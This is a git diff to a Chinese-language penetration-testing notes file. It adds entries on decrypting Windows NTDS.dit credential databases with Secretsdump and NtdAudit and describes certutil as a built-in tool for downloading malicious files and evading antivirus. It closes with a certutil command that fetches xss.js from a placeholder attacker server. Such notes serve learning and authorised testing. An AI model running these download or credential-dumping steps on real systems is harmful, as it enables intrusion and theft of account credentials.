--- a/安全/渗透.md
+++ b/安全/渗透.md
@@ -401,3 +401,16 @@ powershell -exec  bypass -f ListAllUser.psl
 ### 
 
 quarksPwDump 破解 dit 文件
+
+Secretsdump  解密dit 速度比较慢
+
+NtdAudit 解密 ntds.dip 
+
+Certutil 下载 
+
+certutil是windows下一款下载文件的工具，自从WindowsServer2003就自带，但是在Server 2003使用会有问题，也就是说，以下命令是在Win7及其以后的机器中使用。其功能可校验文件MD5，SHA1，SHA256，下载恶意文件和免杀
+
+Certutil是一个CLI程序，可用于转储和显示证书颁发机构（CA），配置信息，证书服务，CA组件的备份和还原以及验证证书，密钥对和证书链，它作为证书服务的一部分安装
+
+下载：
+ certutil.exe -urlcache -split -f http://服务器ip:8000/xss.js
